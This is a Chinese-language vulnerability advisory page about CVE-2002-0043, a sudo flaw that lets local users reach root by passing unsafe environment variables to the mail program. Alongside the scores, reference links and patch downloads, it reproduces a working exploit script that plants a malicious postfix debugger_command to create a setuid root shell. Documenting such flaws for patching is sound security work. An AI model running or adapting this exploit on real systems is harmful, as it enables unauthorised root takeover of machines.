CVE-2002-0043
CVSS7.2
发布时间 :2002-01-31 00:00:00
修订时间 :2016-10-17 22:15:32
NMCOE    

[原文]sudo 1.6.0 through 1.6.3p7 does not properly clear the environment before calling the mail program, which could allow local users to gain root privileges by modifying environment variables and changing how the mail program is invoked.


[CNNVD]Sudo未清环境变量导致以root身份执行命令漏洞(CNNVD-200201-013)

        
        Sudo是一个免费的,开放源码的许可权限管理软件,运行于Linux及一些Unix平台下,程序由Todd C. Miller维护。
        Sudo存在一个漏洞输入验证漏洞,可以使本地攻击者以root身份执行程序。
        在某些情况下,sudo不会正确地清空程序运行时的环境变量。当sudo以root身份去运行一个程序比如MTA时,这可能会导致一个本地用户通过环境变量把非法的数据传递给程序。利用那些环境变量攻击者可能以root身份执行命令,从而提升自己的权限。
        

- CVSS (基础分值)

CVSS分值: 7.2 [严重(HIGH)]
机密性影响: COMPLETE [完全的信息泄露导致所有系统文件暴露]
完整性影响: COMPLETE [系统完整性可被完全破坏]
可用性影响: COMPLETE [可能导致系统完全宕机]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: LOCAL [漏洞利用需要具有物理访问权限或本地帐户]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/a:todd_miller:sudo:1.6.3_p6
cpe:/a:todd_miller:sudo:1.6.3_p5
cpe:/a:todd_miller:sudo:1.6.3_p4
cpe:/a:todd_miller:sudo:1.6.3_p3
cpe:/a:todd_miller:sudo:1.6.3_p7Todd Miller Sudo 1.6.3 p7
cpe:/a:todd_miller:sudo:1.6Todd Miller Sudo 1.6
cpe:/a:todd_miller:sudo:1.6.3Todd Miller Sudo 1.6.3
cpe:/a:todd_miller:sudo:1.6.3_p2
cpe:/a:todd_miller:sudo:1.6.3_p1
cpe:/a:todd_miller:sudo:1.6.1Todd Miller Sudo 1.6.1
cpe:/a:todd_miller:sudo:1.6.2Todd Miller Sudo 1.6.2

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0043
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2002-0043
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200201-013
(官方数据源) CNNVD

- 其它链接及资源

ftp://ftp.freebsd.org/pub/FreeBSD/CERT/advisories/FreeBSD-SN-02%3A06.asc
(UNKNOWN)  FREEBSD  FreeBSD-SA-02:06
http://distro.conectiva.com.br/atualizacoes/?id=a&anuncio=000451
(UNKNOWN)  CONECTIVA  CLA-2002:451
http://frontal2.mandriva.com/security/advisories?name=MDKSA-2002:003
(UNKNOWN)  MANDRAKE  MDKSA-2002:003
http://marc.info/?l=bugtraq&m=101120193627756&w=2
(UNKNOWN)  BUGTRAQ  20020116 Sudo +Postfix Exploit
http://www.debian.org/security/2002/dsa-101
(UNKNOWN)  DEBIAN  DSA-101
http://www.novell.com/linux/security/advisories/2002_002_sudo_txt.html
(UNKNOWN)  SUSE  SuSE-SA:2002:002
http://www.redhat.com/support/errata/RHSA-2002-011.html
(UNKNOWN)  REDHAT  RHSA-2002:011
http://www.redhat.com/support/errata/RHSA-2002-013.html
(VENDOR_ADVISORY)  REDHAT  RHSA-2002:013
http://www.securityfocus.com/advisories/3800
(UNKNOWN)  IMMUNIX  IMNX-2002-70-001-01
http://www.securityfocus.com/archive/1/250168
(VENDOR_ADVISORY)  BUGTRAQ  20020114 Sudo version 1.6.4 now available (fwd)
http://www.securityfocus.com/bid/3871
(UNKNOWN)  BID  3871
http://www.sudo.ws/sudo/alerts/postfix.html
(UNKNOWN)  MISC  http://www.sudo.ws/sudo/alerts/postfix.html
http://xforce.iss.net/static/7891.php
(UNKNOWN)  XF  sudo-unclean-env-root(7891)

- 漏洞信息

Sudo未清环境变量导致以root身份执行命令漏洞
高危 输入验证
2002-01-31 00:00:00 2006-09-05 00:00:00
本地  
        
        Sudo是一个免费的,开放源码的许可权限管理软件,运行于Linux及一些Unix平台下,程序由Todd C. Miller维护。
        Sudo存在一个漏洞输入验证漏洞,可以使本地攻击者以root身份执行程序。
        在某些情况下,sudo不会正确地清空程序运行时的环境变量。当sudo以root身份去运行一个程序比如MTA时,这可能会导致一个本地用户通过环境变量把非法的数据传递给程序。利用那些环境变量攻击者可能以root身份执行命令,从而提升自己的权限。
        

- 公告与补丁

        临时解决方法:
        如果您不能立刻安装补丁或者升级,CNNVD建议您采取以下措施以降低威胁:
        * 暂时去掉sudo程序的的suid属性。
         # chmod a-s suid
        厂商补丁:
        Conectiva
        ---------
        Conectiva已经为此发布了一个安全公告(CLA-2002:451)以及相应补丁:
        CLA-2002:451:sudo
        补丁下载:
        ftp://atualizacoes.conectiva.com.br/5.0/SRPMS/sudo-1.6.4p1-1U50_1cl.src.rpm
        ftp://atualizacoes.conectiva.com.br/5.0/i386/sudo-1.6.4p1-1U50_1cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/5.0/i386/sudo-doc-1.6.4p1-1U50_1cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/5.1/SRPMS/sudo-1.6.4p1-1U51_1cl.src.rpm
        ftp://atualizacoes.conectiva.com.br/5.1/i386/sudo-1.6.4p1-1U51_1cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/5.1/i386/sudo-doc-1.6.4p1-1U51_1cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/6.0/SRPMS/sudo-1.6.4p1-1U60_1cl.src.rpm
        ftp://atualizacoes.conectiva.com.br/6.0/RPMS/sudo-1.6.4p1-1U60_1cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/6.0/RPMS/sudo-doc-1.6.4p1-1U60_1cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/7.0/SRPMS/sudo-1.6.4p1-1U70_1cl.src.rpm
        ftp://atualizacoes.conectiva.com.br/7.0/RPMS/sudo-1.6.4p1-1U70_1cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/7.0/RPMS/sudo-doc-1.6.4p1-1U70_1cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/ferramentas/ecommerce/SRPMS/sudo-1.6.4p1-1U50_1cl.src.rpm
        ftp://atualizacoes.conectiva.com.br/ferramentas/ecommerce/i386/sudo-1.6.4p1-1U50_1cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/ferramentas/ecommerce/i386/sudo-doc-1.6.4p1-1U50_1cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/ferramentas/graficas/SRPMS/sudo-1.6.4p1-1U50_1cl.src.rpm
        ftp://atualizacoes.conectiva.com.br/ferramentas/graficas/i386/sudo-1.6.4p1-1U50_1cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/ferramentas/graficas/i386/sudo-doc-1.6.4p1-1U50_1cl.i386.rpm
        Debian
        ------
        Debian已经为此发布了一个安全公告(DSA-101-1)以及相应补丁:
        DSA-101-1:New sudo packages fix local root exploit
        链接:
        http://www.debian.org/security/2002/dsa-101

        补丁下载:
        Debian GNU/Linux 2.2 alias potato
        - ------------------------------------
         Source archives:
        
        http://security.debian.org/dists/stable/updates/main/source/sudo_1.6.2p2-2.1.dsc

        
        http://security.debian.org/dists/stable/updates/main/source/sudo_1.6.2p2-2.1.diff.gz

        
        http://security.debian.org/dists/stable/updates/main/source/sudo_1.6.2p2.orig.tar.gz

         Alpha architecture:
        
        http://security.debian.org/dists/stable/updates/main/binary-alpha/sudo_1.6.2p2-2.1_alpha.deb

         ARM architecture:
        
        http://security.debian.org/dists/stable/updates/main/binary-arm/sudo_1.6.2p2-2.1_arm.deb

         Intel ia32 architecture:
        
        http://security.debian.org/dists/stable/updates/main/binary-i386/sudo_1.6.2p2-2.1_i386.deb

         Motorola 680x0 architecture:
        
        http://security.debian.org/dists/stable/updates/main/binary-m68k/sudo_1.6.2p2-2.1_m68k.deb

         PowerPC architecture:
        
        http://security.debian.org/dists/stable/updates/main/binary-powerpc/sudo_1.6.2p2-2.1_powerpc.deb

         Sun Sparc architecture:
        
        http://security.debian.org/dists/stable/updates/main/binary-sparc/sudo_1.6.2p2-2.1_sparc.deb

        FreeBSD
        -------
        FreeBSD已经为此发布了一个安全公告(FreeBSD-SA-02:06)以及相应补丁:
        FreeBSD-SA-02:06:sudo port may enable local privilege escalation
        链接:ftp://ftp.freebsd.org/pub/FreeBSD/CERT/advisories/FreeBSD-SA-02:06.sudo.asc
        您可以采用下列方法中的任意一种来修复该安全漏洞:
        1) 对整个移植集进行升级并重建该移植。
        2) 卸载旧版软件包,再从下列地址下载并安装一个修正日期后发布的新版软件包:
        [i386]
        ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/i386/packages-4-stable/security/sudo-1.6.4.1.tgz
        ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/i386/packages-5-current/security/sudo-1.6.4.1.tgz
        3) 从下列地址下载一个新版sudo移植架构并用它重建该移植:
        
        http://www.freebsd.org/ports/

        4) 用portcheckout自动执行第(3)条办法。portcheckout移植在
         /usr/ports/devel/portcheckout,也可从下列地址下载:
        ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/i386/packages-4-stable/devel/portcheckout-2.0.tgz
        ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/i386/packages-5-current/devel/portcheckout-2.0.tgz
        MandrakeSoft
        ------------
        MandrakeSoft已经为此发布了一个安全公告(MDKSA-2002:003)以及相应补丁:
        MDKSA-2002:003:sudo update
        链接:
        http://www.linux

- 漏洞信息 (21227)

Sudo 1.6.3 Unclean Environment Variable Root Program Execution Vulnerability (EDBID:21227)
linux local
2002-01-14 Verified
0 Charles Stevenson
N/A [点击下载]
source: http://www.securityfocus.com/bid/3871/info

Sudo is a freely available, open source permissions management software package available for the Linux and Unix operating systems. It is maintained by Todd C. Miller.

Under some circumstances, sudo does not properly sanitize the environment it executes programs with. In the event that sudo is used to run a program such as an MTA with root privileges, this could result in a local user passing unsafe data to the program via environment variables. From these environment variables the user may be able to execute commands as root, and potentially gain elevated privileges.

#!/bin/sh
#
# root shell exploit for postfix + sudo
# tested on debian powerpc unstable
#
# by Charles 'core' Stevenson <core@bokeoa.com>

# Put your password here if you're not in the sudoers file
PASSWORD=wdnownz

echo -e "sudo exploit by core <core@bokeoa.com>\n"

echo "Setting up postfix config directory..."
/bin/cp -r /etc/postfix /tmp

echo "Adding malicious debugger command..."
echo "debugger_command = /bin/cp /bin/sh /tmp/sh; chmod 4755 /tmp/sh">>/tmp/postfix/main.cf

echo "Setting up environment..."
export MAIL_CONFIG=/tmp/postfix
export MAIL_DEBUG=

sleep 2

echo "Trying to exploit..."
echo -e "$PASSWORD\n"|/usr/bin/sudo su -

sleep 2

echo "We should have a root shell let's check..."
ls -l /tmp/sh

echo "Cleaning up..."
rm -rf /tmp/postfix

echo "Attempting to run root shell..."
/tmp/sh		

- 漏洞信息

2025
sudo Unclean Environment Variable Root Program Execution
Local Access Required Input Manipulation
Loss of Integrity Upgrade
Exploit Public Third-party Verified

- 漏洞描述

sudo 1.6.0 through 1.6.3p7 does not properly clear the environment before calling the mail program, which could allow local users to gain root privileges by modifying environment variables and changing how the mail program is invoked.

- 时间线

2002-01-14 Unknow
2002-01-14 Unknow

- 解决方案

Upgrade to version 1.6.4 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- 相关参考

- 漏洞作者

Unknown or Incomplete
 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站